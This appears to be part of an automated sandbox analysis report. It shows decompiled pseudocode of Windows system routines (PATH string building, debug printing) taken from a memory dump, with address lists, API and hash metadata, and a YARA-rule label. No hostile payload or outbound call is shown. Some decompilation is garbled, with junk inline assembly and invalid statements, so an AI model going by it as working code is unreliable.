						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0306DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0305B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0305B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0305E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0305A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0301b171
0x0301b171
0x0301b171
0x0301b171
0x0301b171
0x0301b176
0x0301b17b
0x0301b180
0x0301b186
0x0301b18f
0x0301b198
0x0301b1a4
0x0301b1aa
0x03074802
0x03074802
0x03074805
0x0307480c
0x0307480e
0x0301b1d1
0x0301b1d3
0x0301b1de
0x0301b1de
0x03074817
0x0307481e
0x03074820
0x03074822
0x03074822
0x03074824
0x03074824
0x0307482a
0x00000000
0x00000000
0x03074835
0x0307483a
0x0307483d
0x0307483f
0x03074842
0x03074842
0x03074842
0x03074846
0x0307484c
0x0307484e
0x03074851
0x03074851
0x03074853
0x03074854
0x03074854
0x03074858
0x0307485a
0x0307485a
0x0307485d
0x0307485f
0x03074861
0x03074861
0x03074866
0x0307486b
0x0307486e
0x03074871
0x03074876
0x03074876
0x03074878
0x0307487b
0x03074884
0x03074884
0x00000000
0x0307487d
0x0307487d
0x03074882
0x03074889
0x03074889
0x0307488f
0x03074891
0x030748e0
0x030748e2
0x030748e4
0x030748e4
0x030748e7
0x030748e7
0x030748ed
0x030748f4
0x030748f6
0x03074951
0x03074951
0x03074953
0x03074953
0x03074956
0x03074956
0x03074958
0x03074959
0x03074959
0x0307495d
0x0307495d
0x0307495f
0x0307495f
0x03074965
0x03074969
0x030749ba
0x030749ba
0x030749c1
0x030749c5
0x030749cc
0x030749d4
0x030749d7
0x030749da
0x030749e4
0x030749e5
0x030749f3
0x03074a02
0x00000000
0x03074a02
0x03074972
0x03074974
0x00000000
0x00000000
0x03074976
0x03074979
0x03074982
0x03074983
0x03074984
0x0307498b
0x0307498d
0x03074991
0x03074993
0x03074999
0x0307499d
0x030749a2
0x030749a2
0x030749a2
0x03074999
0x030749ac
0x00000000
0x030749b3
0x030748f8
0x030748fe
0x00000000
0x00000000
0x00000000
0x030748fe
0x03074895
0x0307489c
0x030748ad
0x030748b2
0x030748b5
0x030748b7
0x030748ba
0x030748bc
0x030748c6
0x030748c6
0x030748cb
0x030748d1
0x030748d4
0x030748d8
0x030748d8
0x00000000
0x030748d8
0x030748be
0x030748c0
0x00000000
0x00000000
0x030748c2
0x00000000
0x00000000
0x00000000
0x030748c4
0x00000000
0x03074882
0x0307487b
0x03074904
0x03074906
0x00000000
0x00000000
0x03074908
0x0307490e
0x00000000
0x00000000
0x03074910
0x03074917
0x03074917
0x00000000
0x03074917
0x0301b1ba
0x030747f9
0x030747fc
0x00000000
0x00000000
0x00000000
0x030747fc
0x0301b1c0
0x0301b1c0
0x0301b1c3
0x0301b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 030748AD

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 3469b0c57eb96fdb2e0d4258536ea5c66d2105e1bfc7233c1d6b69eb4091fe5a
Instruction ID: 3b8a2472f7451f1e347ca7a4d180231d26dec916c671d15148c3f5d0d5b495a9
Opcode Fuzzy Hash: 3469b0c57eb96fdb2e0d4258536ea5c66d2105e1bfc7233c1d6b69eb4091fe5a
Instruction Fuzzy Hash: CA510F75E062698FDBB1CF69C844BAEBBF4BF00310F1841A9E859AB281D3704941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03042581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E03042581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912512) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t238;
				signed int _t242;
				void* _t245;
				signed char _t246;
				signed int _t247;
				signed int _t248;
				void* _t249;
				signed char _t250;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				signed int _t284;
				signed int _t286;
				signed int* _t288;
				signed int _t289;
				unsigned int _t292;
				signed int _t296;
				signed int _t298;
				signed int _t302;
				intOrPtr _t314;
				signed int _t323;
				signed int _t325;
				signed int _t326;
				signed int _t330;
				signed int _t331;
				void* _t336;
				signed int _t337;
				signed int _t339;
				signed int _t342;
				signed int _t343;
				signed char _t345;
				void* _t346;

				_t339 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x310d360 ^ _t339;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t330 = 0x310b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t292 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t346 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t284 = 0x48;
				_t312 = 0 | _t346 == 0x00000000;
				_t323 = 0;
				_v37 = _t346 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t331 = 0xc0000106;
						goto L32;
					} else {
						_t330 = L03034620(_t292,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t330;
						__eflags = _t330;
						if(_t330 == 0) {
							_t331 = 0xc0000017;
							goto L32;
						} else {
							 *(_t330 + 0x44) =  *(_t330 + 0x44) & 0x00000000;
							_t50 = _t330 + 0x48; // 0x48
							_t325 = _t50;
							_t312 = _v32;
							 *(_t330 + 0x3c) = _t284;
							_t286 = 0;
							 *((short*)(_t330 + 0x30)) = _v48;
							__eflags = _t312;
							if(_t312 != 0) {
								 *(_t330 + 0x18) = _t325;
								__eflags = _t312 - 0x3108478;
								 *_t330 = ((0 | _t312 == 0x03108478) - 0x00000001 & 0xfffffffb) + 7;
								E0305F3E0(_t325,  *((intOrPtr*)(_t312 + 4)),  *_t312 & 0x0000ffff);
								_t312 = _v32;
								_t343 = _t343 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t325 = _t325 + (( *_t312 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E030A39F2(_t325);
									_t312 = _v32;
									_t325 = _t278;
								}
							}
							_t296 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t331 = _v68;
								__eflags = 0;
								 *((short*)(_t325 - 2)) = 0;
								goto L32;
							} else {
								_t284 = _t330 + _t286 * 4;
								_v56 = _t284;
								do {
									__eflags = _t312;
									if(_t312 != 0) {
										_t238 =  *(_v60 + _t296 * 4);
										__eflags = _t238;
										if(_t238 == 0) {
											goto L30;
										} else {
											__eflags = _t238 == 5;
											if(_t238 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t284 =  *(_v60 + _t296 * 4);
										 *(_t284 + 0x18) = _t325;
										_t242 =  *(_v60 + _t296 * 4);
										__eflags = _t242 - 8;
										if(_t242 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t242 * 4 +  &M03042959))) {
												case 0:
													__ax =  *0x3108488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0305F3E0(__edi,  *0x310848c, __ax & 0x0000ffff);
														__eax =  *0x3108488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0305F3E0(_t325, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0x3108480 & 0x0000ffff = E0305F3E0(__edi,  *0x3108484,  *0x3108480 & 0x0000ffff);
													__eax =  *0x3108480 & 0x0000ffff;
													__eax = ( *0x3108480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0305F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0305F3E0(_t325, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t325 = _t325 + (_t273 >> 1) * 2 + 2;
													__eflags = _t325;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t325 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0x310575c;
													__eflags = __ebx - 0x310575c;
													if(__ebx != 0x310575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0305F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x310575c;
														} while (__ebx != 0x310575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3108478 & 0x0000ffff = E0305F3E0(__edi,  *0x310847c,  *0x3108478 & 0x0000ffff);
													__eax =  *0x3108478 & 0x0000ffff;
													__eax = ( *0x3108478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E030A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3106e58 & 0x0000ffff = E0305F3E0(__edi,  *0x3106e5c,  *0x3106e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3106e58 & 0x0000ffff;
													__eax = ( *0x3106e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t296 = _v16;
													_t312 = _v32;
													L29:
													_t284 = _t284 + 4;
													__eflags = _t284;
													_v56 = _t284;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t296 = _t296 + 1;
									_v16 = _t296;
									__eflags = _t296 - _v48;
								} while (_t296 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t242 =  *(_v60 + _t323 * 4);
						if(_t242 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t242 * 4 +  &M03042935))) {
							case 0:
								__ax =  *0x3108488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t312 =  &_v64;
								_v80 = E03042E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3108480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3108480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0302EEF0(0x31079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0302EB70(__ecx, 0x31079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t216 = _v72;
											__eflags = _t216;
											if(_t216 != 0) {
												L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
											}
											_t217 = _v52;
											__eflags = _t217;
											if(_t217 != 0) {
												__eflags = _t331;
												if(_t331 < 0) {
													L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
													_t217 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t292 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3107b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0302EB70(__ecx, 0x31079a0);
										__eax = _v52;
										L36:
										_pop(_t324);
										_pop(_t332);
										__eflags = _v8 ^ _t339;
										_pop(_t285);
										return E0305B640(_t217, _t285, _v8 ^ _t339, _t312, _t324, _t332);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t312 =  &_v36;
									_t282 = E03042E3E(_t280,  &_v36);
									_t292 = _v36;
									_v76 = _t282;
								}
								if(_t292 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t292;
								}
								goto L14;
							case 6:
								__eax =  *0x3105764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3108478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3108478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3106e58 & 0x0000ffff;
								__eax = ( *0x3106e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t323 = _t323 + 1;
								if(_t323 >= _v48) {
									goto L16;
								} else {
									_t312 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [ebx+eax], al");
					asm("loopne 0x29");
					_t245 = _t242 + 9;
					 *((intOrPtr*)(_t284 + _t245)) =  *((intOrPtr*)(_t284 + _t245)) - _t245;
					_t246 = _t245 + 0x1f030426;
					_t288 = 0x25;
					 *_t288 =  *_t288 | _t246;
					_t247 = _t343;
					_t345 = _t246;
					 *((intOrPtr*)(_t288 + _t247)) =  *((intOrPtr*)(_t288 + _t247)) - _t247;
					_t248 = _t247 ^ 0x0203085b;
					 *((intOrPtr*)(_t288 + _t248)) =  *((intOrPtr*)(_t288 + _t248)) - _t248;
					 *_t248 =  *_t248 - 4;
					asm("daa");
					_t249 = _t248 + 3;
					_push(ds);
					 *((intOrPtr*)(_t288 + _t249)) =  *((intOrPtr*)(_t288 + _t249)) - _t249;
					 *((intOrPtr*)(_t288 + _t249)) =  *((intOrPtr*)(_t288 + _t249)) - _t249;
					asm("daa");
					_t250 = _t249 + 3;
					asm("fcomp dword [ebx+0x8]");
					_t336 = _t330 + 1 + _t330 + 1 - 1 +  *((intOrPtr*)(_t250 +  &_a1546912512));
					 *_t288 =  *_t288 | _t250;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x30eff00);
					E0306D08C(_t288, _t325, _t336);
					_v44 =  *[fs:0x18];
					_t326 = 0;
					 *_a24 = 0;
					_t289 = _a12;
					__eflags = _t289;
					if(_t289 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t337 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t302 = _t255 * 0xc;
							_v48 = _t302;
							__eflags = _t289 -  *((intOrPtr*)(_t302 + 0x2ff1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E0305E5C0(_a8,  *((intOrPtr*)(_t302 + 0x2ff1668)), _t289);
									_t345 = _t345 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t337 = E030951BE(_t289,  *((intOrPtr*)(_v48 + 0x2ff166c)), _a16, _t326, _t337, __eflags, _a20, _a24);
										_v52 = _t337;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t337;
						__eflags = _t337;
						if(_t337 < 0) {
							__eflags = _t337 - 0xc0000100;
							if(_t337 == 0xc0000100) {
								_t298 = _a4;
								__eflags = _t298;
								if(_t298 != 0) {
									_v36 = _t298;
									__eflags =  *_t298 - _t326;
									if( *_t298 == _t326) {
										_t337 = 0xc0000100;
										goto L76;
									} else {
										_t314 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t314 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t298;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t298) {
											__eflags =  *(_t314 + 0x1c);
											if( *(_t314 + 0x1c) == 0) {
												L106:
												_t337 = E03042AE4( &_v36, _a8, _t289, _a16, _a20, _a24);
												_v32 = _t337;
												__eflags = _t337 - 0xc0000100;
												if(_t337 != 0xc0000100) {
													goto L69;
												} else {
													_t326 = 1;
													_t298 = _v36;
													goto L75;
												}
											} else {
												_t260 = E03026600( *(_t314 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t298 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t337 = E03042C50(_t298, _a8, _t289, _a16, _a20, _a24, _t326);
											L76:
											_v32 = _t337;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0302EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t337 = _a24;
									_t267 = E03042AE4( &_v36, _a8, _t289, _a16, _a20, _t337);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E03042C50(_v36, _a8, _t289, _a16, _a20, _t337, 1);
									}
									_v8 = _t326;
									E03042ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t337;
					}
					L70:
					return E0306D0D1(_t253);
				}
				L108:
			}

0x03042584
0x03042586
0x03042590
0x03042596
0x03042597
0x03042598
0x03042599
0x0304259e
0x030425a4
0x030425a9
0x030425ac
0x030425ae
0x030425b1
0x030425b2
0x030425b5
0x030425b8
0x030425bb
0x030425bc
0x030425bf
0x030425c2
0x030425c5
0x030425c6
0x030425cb
0x030425ce
0x030425d8
0x030425db
0x030425dd
0x030425de
0x030425e1
0x030425e3
0x030425e9
0x030426da
0x030426da
0x030426dd
0x030426e2
0x03085b56
0x00000000
0x030426e8
0x030426f9
0x030426fb
0x030426fe
0x03042700
0x03085b60
0x00000000
0x03042706
0x03042706
0x0304270a
0x0304270a
0x0304270d
0x03042713
0x03042716
0x03042718
0x0304271c
0x0304271e
0x03085b6c
0x03085b6f
0x03085b7f
0x03085b89
0x03085b8e
0x03085b93
0x03085b96
0x03085b9c
0x03085ba0
0x03085ba3
0x03085bab
0x03085bb0
0x03085bb3
0x03085bb3
0x03085ba3
0x03042724
0x03042726
0x03042729
0x0304272c
0x0304279d
0x0304279d
0x030427a0
0x030427a2
0x00000000
0x0304272e
0x0304272e
0x03042731
0x03042734
0x03042734
0x03042736
0x03085bc1
0x03085bc1
0x03085bc4
0x00000000
0x03085bca
0x03085bca
0x03085bcd
0x00000000
0x03085bd3
0x00000000
0x03085bd3
0x03085bcd
0x0304273c
0x0304273c
0x03042742
0x03042747
0x0304274a
0x0304274d
0x03042750
0x00000000
0x03042756
0x03042756
0x00000000
0x03042902
0x03042908
0x0304290b
0x00000000
0x03042911
0x0304291c
0x03042921
0x00000000
0x03042921
0x00000000
0x00000000
0x03042880
0x03042887
0x0304288c
0x00000000
0x00000000
0x03042805
0x0304280a
0x03042814
0x03042816
0x00000000
0x00000000
0x0304281e
0x03042821
0x03042823
0x00000000
0x03042829
0x03042829
0x03042831
0x0304283c
0x0304283e
0x00000000
0x0304283e
0x00000000
0x00000000
0x0304284e
0x03042850
0x03042851
0x03042854
0x03042857
0x0304285a
0x0304285c
0x0304285d
0x00000000
0x00000000
0x0304275d
0x03042761
0x00000000
0x03042767
0x0304276e
0x03042773
0x03042773
0x03042776
0x03042778
0x0304277e
0x0304277e
0x03042781
0x03042781
0x03042783
0x03042784
0x00000000
0x00000000
0x03085bd8
0x03085bde
0x03085be4
0x03085be6
0x03085be8
0x03085be9
0x03085bee
0x03085bf8
0x03085bff
0x03085c01
0x03085c04
0x03085c07
0x03085c0b
0x03085c0d
0x03085c0d
0x03085c15
0x03085c18
0x03085c1b
0x03085c1b
0x03085c1e
0x00000000
0x00000000
0x030428c3
0x030428c8
0x030428d2
0x030428d4
0x030428d8
0x030428db
0x03085c26
0x03085c28
0x03085c2d
0x03085c2d
0x00000000
0x00000000
0x03085c34
0x03085c36
0x03085c49
0x03085c4e
0x03085c54
0x03085c5b
0x03085c5d
0x03085c60
0x03042788
0x03042788
0x0304278b
0x0304278e
0x0304278e
0x0304278e
0x03042791
0x00000000
0x00000000
0x03042756
0x03042750
0x00000000
0x03042794
0x03042794
0x03042795
0x03042798
0x03042798
0x00000000
0x03042734
0x0304272c
0x03042700
0x030425ef
0x030425ef
0x030425ef
0x030425f2
0x030425f8
0x00000000
0x00000000
0x030425fe
0x00000000
0x030428e6
0x030428ec
0x030428ef
0x030428f5
0x030428f8
0x030428f8
0x00000000
0x030428f8
0x00000000
0x00000000
0x03042866
0x03042866
0x03042876
0x03042879
0x00000000
0x00000000
0x030427e0
0x030427e7
0x030427e9
0x030427eb
0x03085afd
0x00000000
0x03085afd
0x00000000
0x00000000
0x03042633
0x03042638
0x0304263b
0x0304263c
0x0304263e
0x03042640
0x03042642
0x03042647
0x03042649
0x0304264e
0x03042650
0x03042653
0x03042659
0x030426a2
0x030426a7
0x030426ac
0x030426b2
0x03085b11
0x03085b15
0x03085b17
0x00000000
0x030426b8
0x030426b8
0x030426ba
0x030427a6
0x030427a6
0x030427a9
0x030427ab
0x030427b9
0x030427b9
0x030427be
0x030427c1
0x030427c3
0x030427c5
0x030427c7
0x03085c74
0x03085c79
0x03085c79
0x030427c7
0x00000000
0x030426c0
0x030426c0
0x030426c3
0x030426c6
0x030426c6
0x030426c9
0x030426c9
0x00000000
0x030426c9
0x030426ba
0x0304265b
0x0304265b
0x0304265e
0x03042667
0x0304266d
0x03042677
0x0304267c
0x0304267f
0x03042681
0x03085b49
0x03085b4e
0x030427cd
0x030427d0
0x030427d1
0x030427d2
0x030427d4
0x030427dd
0x03042687
0x03042687
0x0304268a
0x0304268b
0x0304268e
0x0304268f
0x03042691
0x03042696
0x03042698
0x0304269d
0x0304269f
0x00000000
0x0304269f
0x03042681
0x00000000
0x00000000
0x03042846
0x00000000
0x00000000
0x03042605
0x0304260a
0x0304260c
0x03042611
0x03042616
0x03042619
0x03042619
0x0304261e
0x00000000
0x03042624
0x03042627
0x03042627
0x00000000
0x00000000
0x03085b1f
0x00000000
0x00000000
0x03042894
0x0304289b
0x0304289d
0x030428a1
0x03085b2b
0x03085b2e
0x03085b2e
0x030428a7
0x030428a9
0x03085b04
0x03085b09
0x03085b09
0x03085b09
0x00000000
0x00000000
0x03085b35
0x03085b3c
0x030428fb
0x030428fb
0x030426cc
0x030426cc
0x030426d0
0x00000000
0x030426d2
0x030426d2
0x00000000
0x030426d2
0x00000000
0x00000000
0x030425fe
0x0304292d
0x03042930
0x03042935
0x03042939
0x0304293d
0x03042941
0x03042946
0x03042949
0x0304294e
0x0304294f
0x03042951
0x03042951
0x03042952
0x03042955
0x0304295a
0x0304295d
0x03042962
0x03042963
0x03042965
0x03042966
0x0304296a
0x0304296e
0x0304296f
0x03042971
0x03042974
0x0304297b
0x0304297d
0x0304297e
0x0304297f
0x03042980
0x03042981
0x03042982
0x03042983
0x03042984
0x03042985
0x03042986
0x03042987
0x03042988
0x03042989
0x0304298a
0x0304298b
0x0304298c
0x0304298d
0x0304298e
0x0304298f
0x03042990
0x03042992
0x03042997
0x030429a3
0x030429a6
0x030429ab
0x030429ad
0x030429b0
0x030429b2
0x03085c80
0x030429b8
0x030429b8
0x030429bb
0x030429c0
0x030429c5
0x030429c6
0x030429c6
0x030429c9
0x030429cb
0x00000000
0x00000000
0x030429cd
0x030429d0
0x030429d9
0x030429db
0x030429dd
0x03042a7f
0x03042a84
0x03042a87
0x03042a89
0x03085ca1
0x03085ca3
0x00000000
0x03042a8f
0x03042a8f
0x00000000
0x03042a8f
